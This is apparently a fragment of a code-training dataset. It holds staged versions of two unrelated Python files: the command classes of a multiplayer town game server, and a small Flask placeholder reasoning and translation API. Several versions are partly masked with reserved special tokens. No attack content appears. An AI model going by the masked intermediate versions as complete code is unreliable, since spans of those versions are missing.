EnergyCheck(self.town.get_player(self.client_id), HelpPlayerCommand\n .ENERGY_TO_HELP).check(self.check_result)\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check)\n if is_alive_check:\n self.check_result += '{} has enough health to keep moving'.format(\n self._player_to_help_id)\n\n def _do(self):\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n player_to_help = self.town.get_player(self._player_to_help_id)\n player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = 'HelpPlayerCommand: try to help {}'.format(self.\n _player_to_help_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->HelpPlayerCommand:\n return cls(json_dict['player_to_help_id'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'help'\n json_dict['player_to_help_id'] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n COMMANDS_DICT = {}\n COMMANDS_DICT['move'] = MovePlayerCommand\n COMMANDS_DICT['build'] = BuildCommand\n COMMANDS_DICT['collect'] = CollectResourceCommand\n COMMANDS_DICT['building_process'] = BuildingProcessCommand\n COMMANDS_DICT['buy'] = BuyCommand\n COMMANDS_DICT['sell'] = SellCommand\n COMMANDS_DICT['build_building'] = BuildBuildingCommand\n COMMANDS_DICT['upgrade_building'] = UpgradeBuildingCommand\n COMMANDS_DICT['help'] = HelpPlayerCommand\n COMMANDS_DICT['sleep'] = SleepCommand\n COMMANDS_DICT['wakeup'] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n if podsixnet_dict['command'] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[podsixnet_dict['command']\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n command.client_id = podsixnet_dict['client_id']\n command.check_result = CheckResult.from_json_dict(podsixnet_dict[\n 'check_result'])\n return command\n",
"step-5": "from __future__ import annotations\n\nimport math\nfrom abc import abstractmethod\n\nfrom pytown_core.patterns.behavioral import Command\nfrom pytown_core.serializers import IJSONSerializable\n\nfrom .buildings import BuildingProcess, BuildingTransaction\nfrom .buildings.factory import BuildingFactory\nfrom .check import (\n AvailableCheck,\n AwakenCheck,\n BackgroundBuildCheck,\n BackgroundMovementCheck,\n CheckResult,\n EnergyCheck,\n InventoryAddCheck,\n InventoryRemoveCheck,\n TransactionCheck,\n)\nfrom .inventory import Item\n\n\nclass ServerCommand(IJSONSerializable, Command):\n def __init__(self):\n\n self.client_id = None\n self.town = None # TODO: will be set by townmanager\n self.check_result = CheckResult()\n\n def execute(self):\n self._check()\n\n if self.check_result:\n self._do()\n\n @abstractmethod\n def _check(self):\n raise NotImplementedError\n\n @abstractmethod\n def _do(self):\n raise NotImplementedError\n\n @abstractmethod\n def __repr__(self):\n pass\n\n @classmethod\n @abstractmethod\n def from_json_dict(cls, json_dict) -> ServerCommand:\n raise NotImplementedError\n\n def to_json_dict(self) -> dict:\n json_dict = {}\n json_dict[\"client_id\"] = self.client_id\n json_dict[\"check_result\"] = self.check_result.to_json_dict()\n return json_dict\n\n def to_podsixnet(self):\n podsixnet_dict = self.to_json_dict()\n podsixnet_dict[\"action\"] = \"command\"\n return podsixnet_dict\n\n\nclass MovePlayerCommand(ServerCommand):\n\n ENERGY_COST = 1\n\n def __init__(self, direction: str):\n ServerCommand.__init__(self)\n\n self._direction = direction\n\n def __repr__(self):\n msg = \"Move ServerCommand : {}\".format(self._direction)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n EnergyCheck(player, MovePlayerCommand.ENERGY_COST).check(self.check_result)\n\n AvailableCheck(player).check(self.check_result)\n\n for tile in self._get_tiles_coordinates_dict().values():\n if tile not in self.town.backgrounds.keys():\n self.check_result += \"tile {} not in town\".format(tile)\n return\n\n BackgroundMovementCheck(self.town.backgrounds[tile], player).check(\n self.check_result\n )\n\n def _do(self):\n\n (x_dest, y_dest) = self.tile_dest\n player = self.town.get_player(self.client_id)\n player.status = \"move\"\n player.direction = self._direction\n player.energy.value -= MovePlayerCommand.ENERGY_COST\n\n player.x = x_dest\n player.y = y_dest\n\n @property\n def tile_dest(self) -> tuple:\n movement_matrix = {}\n movement_matrix[\"left\"] = (-1, 0)\n movement_matrix[\"right\"] = (+1, 0)\n movement_matrix[\"up\"] = (0, -1)\n movement_matrix[\"down\"] = (0, +1)\n\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n background = self.town.backgrounds[tile]\n\n bg_multiplicator = background.move_multiplicator\n x_dest = (\n player.x\n + movement_matrix[self._direction][0] * bg_multiplicator * player.velocity\n )\n y_dest = (\n player.y\n + movement_matrix[self._direction][1] * bg_multiplicator * player.velocity\n )\n\n return (x_dest, y_dest)\n\n def _get_tiles_coordinates_dict(self):\n\n (x_dest, y_dest) = self.tile_dest\n\n tiles_coordinates_dict = {\n \"topleft\": (math.floor(x_dest), math.floor(y_dest)),\n \"topright\": (math.floor(x_dest + 0.99), math.floor(y_dest)),\n \"bottomleft\": (math.floor(x_dest), math.floor(y_dest + 0.99)),\n \"bottomright\": (math.floor(x_dest + 0.99), math.floor(y_dest + 0.99)),\n }\n return tiles_coordinates_dict\n\n @classmethod\n def from_json_dict(cls, json_dict) -> MovePlayerCommand:\n return cls(json_dict[\"direction\"])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"move\"\n json_dict[\"direction\"] = self._direction\n return json_dict\n\n\nclass BuildCommand(ServerCommand):\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n\n self._tile = tile\n self._building_name = building_name\n\n def _check(self):\n\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n\n if self._tile not in self.town.backgrounds:\n self.check_result += \"tile {} not in town\".format(self._tile)\n return\n\n background = self.town.backgrounds[self._tile]\n BackgroundBuildCheck(background, self._building_name).check(self.check_result)\n\n if self._tile in self.town.buildings:\n self.check_result += \"Can't build {} : {} already built on {}\".format(\n self._building_name, self.town.buildings[self._tile].name, self._tile\n )\n\n def _do(self):\n self.town.set_building(\n BuildingFactory.create_building_by_name(self._building_name), self._tile\n )\n\n def __repr__(self):\n msg = \"Build ServerCommand : {} in {}\".format(self._building_name, self._tile)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> BuildCommand:\n return cls(json_dict[\"tile\"], json_dict[\"building_name\"])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"build\"\n json_dict[\"building_name\"] = self._building_name\n json_dict[\"tile\"] = self._tile\n return json_dict\n\n\nclass CollectResourceCommand(ServerCommand):\n\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n\n AvailableCheck(player).check(self.check_result)\n\n if self._tile not in self.town.resources:\n self.check_result += \"No resource in {}\".format(self._tile)\n return\n\n resource = self.town.resources[self._tile]\n\n TransactionCheck(resource, player, self._item).check(self.check_result)\n\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.check_result)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = \"Collect Resource ServerCommand : {}\".format(self._item)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> CollectResourceCommand:\n return cls(json_dict[\"tile\"], Item.from_json_dict(json_dict[\"item\"]))\n\n def to_json_dict(self) -> dict:\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"collect\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"item\"] = self._item.to_json_dict()\n return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n\n if self._tile not in self.town.buildings:\n self.check_result += \"No building on {}\".format(self._tile)\n return\n\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n InventoryRemoveCheck(\n building.inventory, self._building_process.item_required\n ).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.item_result).check(\n self.check_result\n )\n EnergyCheck(player, self._building_process.energy_required).check(\n self.check_result\n )\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = \"BuildingProcessCommand ServerCommand {}\".format(self._building_process)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(\n json_dict[\"tile\"],\n BuildingProcess.from_json_dict(json_dict[\"building_process\"]),\n )\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"building_process\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"building_process\"] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n item = Item(self._transaction.item_name, 1)\n\n AvailableCheck(player).check(self.check_result)\n\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = \"BuyCommand ServerCommand {}\".format(self._transaction.item_name)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(\n json_dict[\"tile\"],\n BuildingTransaction.from_json_dict(json_dict[\"transaction\"]),\n )\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"buy\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"transaction\"] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass SellCommand(ServerCommand):\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n item = Item(self._transaction.item_name, 1)\n\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = \"SellCommand ServerCommand {}\".format(self._transaction.item_name)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(\n json_dict[\"tile\"],\n BuildingTransaction.from_json_dict(json_dict[\"transaction\"]),\n )\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"sell\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"transaction\"] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass BuildBuildingCommand(ServerCommand):\n\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n AvailableCheck(player).check(self.check_result)\n\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.check_result)\n TransactionCheck(building, building, self._item).check(self.check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = \"Build Building ServerCommand {}\".format(self._item)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict[\"tile\"], Item.from_json_dict(json_dict[\"item\"]))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"build_building\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"item\"] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n\n if not building.construction_inventory.is_full():\n self.check_result += \"construction not finished\"\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = \"Upgrade Building ServerCommand {}\".format(self._tile)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict[\"tile\"])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"upgrade_building\"\n json_dict[\"tile\"] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n\n tile = self.town.get_player_tile(self.client_id)\n\n # Player not in building\n if tile in self.town.buildings and self.town.buildings[tile].name != \"cabane\":\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n\n # Change player sprite\n player.status = \"sleep\"\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND\n\n # Change energy regeneration depending on where he sleeps\n if tile in self.town.buildings and self.town.buildings[tile].name == \"cabane\":\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = \"Sleep command. Player id: {}\".format(self.client_id)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"sleep\"\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n\n player = self.town.get_player(self.client_id)\n\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n\n if is_awaken_check:\n self.check_result += \"{} is already awake\".format(player.name)\n\n def _do(self):\n\n player = self.town.get_player(self.client_id)\n player.status = \"idle\"\n\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = \"Wake up command. Player id: {}\".format(self.client_id)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"wakeup\"\n return json_dict\n\n\nclass HelpPlayerCommand(ServerCommand):\n\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n\n # The two players id exists in the town ?\n if self.client_id not in self.town.players.keys():\n self.check_result += \"Player {} does not exist\".format(self.client_id)\n return\n\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += \"Player {} does not exist\".format(\n self._player_to_help_id\n )\n return\n\n # Check if the two players are in the same tile\n if self.town.get_player_tile(self.client_id) != self.town.get_player_tile(\n self._player_to_help_id\n ):\n self.check_result += \"Players {} and {} are not in the same tile\".format(\n self.client_id, self._player_to_help_id\n )\n return\n\n # Check if I have enough energy to help\n EnergyCheck(\n self.town.get_player(self.client_id), HelpPlayerCommand.ENERGY_TO_HELP\n ).check(self.check_result)\n\n # Check if patient doesn't have health\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check\n )\n\n if is_alive_check:\n self.check_result += \"{} has enough health to keep moving\".format(\n self._player_to_help_id\n )\n\n def _do(self):\n\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n\n player_to_help = self.town.get_player(self._player_to_help_id)\n player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = \"HelpPlayerCommand: try to help {}\".format(self._player_to_help_id)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> HelpPlayerCommand:\n return cls(json_dict[\"player_to_help_id\"])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"help\"\n json_dict[\"player_to_help_id\"] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n\n COMMANDS_DICT = {}\n COMMANDS_DICT[\"move\"] = MovePlayerCommand\n COMMANDS_DICT[\"build\"] = BuildCommand\n COMMANDS_DICT[\"collect\"] = CollectResourceCommand\n COMMANDS_DICT[\"building_process\"] = BuildingProcessCommand\n COMMANDS_DICT[\"buy\"] = BuyCommand\n COMMANDS_DICT[\"sell\"] = SellCommand\n COMMANDS_DICT[\"build_building\"] = BuildBuildingCommand\n COMMANDS_DICT[\"upgrade_building\"] = UpgradeBuildingCommand\n COMMANDS_DICT[\"help\"] = HelpPlayerCommand\n COMMANDS_DICT[\"sleep\"] = SleepCommand\n COMMANDS_DICT[\"wakeup\"] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n\n if podsixnet_dict[\"command\"] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[\n podsixnet_dict[\"command\"]\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n\n command.client_id = podsixnet_dict[\"client_id\"]\n command.check_result = CheckResult.from_json_dict(\n podsixnet_dict[\"check_result\"]\n )\n return command\n",
"step-ids": [
72,
74,
84,
86,
98
]
}
|
[
72,
74,
84,
86,
98
] |
<|reserved_special_token_0|>
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
<|reserved_special_token_0|>
@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',
'POST'])
def reason_apply():
rule_id = request.args.get('id')
if rule_id == 'reasonEnglish':
json_data = request.get_json()
new_goal = common_transform(json_data, 'goal')
return jsonify({'result': 'success', 'newGoals': [new_goal] if
new_goal['data'] else []})
else:
return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})
@app.route('/api/{}/translate'.format(VERSION_STRING))
def translate_base():
other_languages = ['lang.speedith', 'lang.isabelle']
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield x, y
yield y, x
return jsonify({'result': 'success', 'translations': [(from_lang,
to_lang, 'manual') for from_lang, to_lang in all_pairs(
other_languages, [LANG_ID])]})
@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[
'GET', 'POST'])
def translate_apply():
from_language = request.args.get('from')
to_language = request.args.get('to')
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,
to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, 'formula')
return jsonify({'result': 'success', 'formula': new_goal})
else:
return jsonify({'result': 'failure', 'reason':
'Unable to translate when one of the languages is not {}'.
format(LANG_ID)})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/')
def entry():
return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':
'https://aaron.stockdill.nz/', 'version': VERSION_STRING,
'description': 'A placeholder natural language reasoner.', 'icon':
'', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(
VERSION_STRING), 'provides': {'reason': '/reason', 'translate':
'/translate'}}])
<|reserved_special_token_0|>
@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',
'POST'])
def reason_apply():
rule_id = request.args.get('id')
if rule_id == 'reasonEnglish':
json_data = request.get_json()
new_goal = common_transform(json_data, 'goal')
return jsonify({'result': 'success', 'newGoals': [new_goal] if
new_goal['data'] else []})
else:
return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})
@app.route('/api/{}/translate'.format(VERSION_STRING))
def translate_base():
other_languages = ['lang.speedith', 'lang.isabelle']
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield x, y
yield y, x
return jsonify({'result': 'success', 'translations': [(from_lang,
to_lang, 'manual') for from_lang, to_lang in all_pairs(
other_languages, [LANG_ID])]})
@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[
'GET', 'POST'])
def translate_apply():
from_language = request.args.get('from')
to_language = request.args.get('to')
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,
to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, 'formula')
return jsonify({'result': 'success', 'formula': new_goal})
else:
return jsonify({'result': 'failure', 'reason':
'Unable to translate when one of the languages is not {}'.
format(LANG_ID)})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
VERSION = 0, 1, 0
VERSION_STRING = '{}.{}.{}'.format(*VERSION)
LANG_ID = 'lang.natural.english'
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/')
def entry():
return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':
'https://aaron.stockdill.nz/', 'version': VERSION_STRING,
'description': 'A placeholder natural language reasoner.', 'icon':
'', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(
VERSION_STRING), 'provides': {'reason': '/reason', 'translate':
'/translate'}}])
@app.route('/api/{}/reason'.format(VERSION_STRING))
def reason_base():
return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',
'reasonEnglish', 'Manually reason with natural language.']]})
def common_transform(json_data, key):
old_goal = json_data.get(key)
new_goal_data = json_data.get('extraInfo')
new_goal = old_goal.copy()
new_goal['data'] = new_goal_data
new_goal['language'] = LANG_ID
print(new_goal)
return new_goal
@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',
'POST'])
def reason_apply():
rule_id = request.args.get('id')
if rule_id == 'reasonEnglish':
json_data = request.get_json()
new_goal = common_transform(json_data, 'goal')
return jsonify({'result': 'success', 'newGoals': [new_goal] if
new_goal['data'] else []})
else:
return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})
@app.route('/api/{}/translate'.format(VERSION_STRING))
def translate_base():
other_languages = ['lang.speedith', 'lang.isabelle']
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield x, y
yield y, x
return jsonify({'result': 'success', 'translations': [(from_lang,
to_lang, 'manual') for from_lang, to_lang in all_pairs(
other_languages, [LANG_ID])]})
@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[
'GET', 'POST'])
def translate_apply():
from_language = request.args.get('from')
to_language = request.args.get('to')
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,
to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, 'formula')
return jsonify({'result': 'success', 'formula': new_goal})
else:
return jsonify({'result': 'failure', 'reason':
'Unable to translate when one of the languages is not {}'.
format(LANG_ID)})
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
from flask import Flask, jsonify, make_response, request
app = Flask(__name__)
VERSION = 0, 1, 0
VERSION_STRING = '{}.{}.{}'.format(*VERSION)
LANG_ID = 'lang.natural.english'
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/')
def entry():
return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':
'https://aaron.stockdill.nz/', 'version': VERSION_STRING,
'description': 'A placeholder natural language reasoner.', 'icon':
'', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(
VERSION_STRING), 'provides': {'reason': '/reason', 'translate':
'/translate'}}])
@app.route('/api/{}/reason'.format(VERSION_STRING))
def reason_base():
return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',
'reasonEnglish', 'Manually reason with natural language.']]})
def common_transform(json_data, key):
old_goal = json_data.get(key)
new_goal_data = json_data.get('extraInfo')
new_goal = old_goal.copy()
new_goal['data'] = new_goal_data
new_goal['language'] = LANG_ID
print(new_goal)
return new_goal
@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',
'POST'])
def reason_apply():
rule_id = request.args.get('id')
if rule_id == 'reasonEnglish':
json_data = request.get_json()
new_goal = common_transform(json_data, 'goal')
return jsonify({'result': 'success', 'newGoals': [new_goal] if
new_goal['data'] else []})
else:
return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})
@app.route('/api/{}/translate'.format(VERSION_STRING))
def translate_base():
other_languages = ['lang.speedith', 'lang.isabelle']
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield x, y
yield y, x
return jsonify({'result': 'success', 'translations': [(from_lang,
to_lang, 'manual') for from_lang, to_lang in all_pairs(
other_languages, [LANG_ID])]})
@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[
'GET', 'POST'])
def translate_apply():
from_language = request.args.get('from')
to_language = request.args.get('to')
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,
to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, 'formula')
return jsonify({'result': 'success', 'formula': new_goal})
else:
return jsonify({'result': 'failure', 'reason':
'Unable to translate when one of the languages is not {}'.
format(LANG_ID)})
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
from flask import Flask, jsonify, make_response, request
app = Flask(__name__)
VERSION = (0, 1, 0)
VERSION_STRING = "{}.{}.{}".format(*VERSION)
LANG_ID = "lang.natural.english"
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route("/")
def entry():
return jsonify([{
"id": "com.natlang",
"name": "NatLang",
"website": "https://aaron.stockdill.nz/",
"version": VERSION_STRING,
"description": "A placeholder natural language reasoner.",
"icon": "",
"base": "http://aarons-macbook.local:5003/api/{}".format(VERSION_STRING),
"provides": {
"reason": "/reason",
"translate": "/translate"
}
}])
@app.route("/api/{}/reason".format(VERSION_STRING))
def reason_base():
return jsonify({
"result": "success",
"reasoning": [[LANG_ID, "manual", "reasonEnglish", "Manually reason with natural language."]]
})
def common_transform(json_data, key):
old_goal = json_data.get(key)
new_goal_data = json_data.get("extraInfo")
new_goal = old_goal.copy()
new_goal["data"] = new_goal_data
new_goal["language"] = LANG_ID
print(new_goal)
return new_goal
@app.route("/api/{}/reason/apply".format(VERSION_STRING), methods=["GET", "POST"])
def reason_apply():
rule_id = request.args.get("id")
if rule_id == "reasonEnglish":
json_data = request.get_json()
new_goal = common_transform(json_data, "goal")
return jsonify({
"result": "success",
"newGoals": [new_goal] if new_goal["data"] else []
})
else:
return jsonify({
"result": "failure",
"reason": "Unknown rule ID."
})
@app.route("/api/{}/translate".format(VERSION_STRING))
def translate_base():
other_languages = ["lang.speedith", "lang.isabelle"]
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield (x, y)
yield (y, x)
return jsonify({
"result": "success",
"translations": [(from_lang, to_lang, "manual")
for (from_lang, to_lang) in all_pairs(other_languages, [LANG_ID])]
})
@app.route("/api/{}/translate/translate".format(VERSION_STRING), methods=["GET", "POST"])
def translate_apply():
from_language = request.args.get("from")
to_language = request.args.get("to")
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language, to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, "formula")
return jsonify({
"result": "success",
"formula": new_goal
})
else:
return jsonify({
"result": "failure",
"reason": "Unable to translate when one of the languages is not {}".format(LANG_ID)
})
if __name__ == "__main__":
app.run()
|
flexible
|
{
"blob_id": "49e1dc98ecc2e5c12c6e520721a6c0a7c2665cca",
"index": 3450,
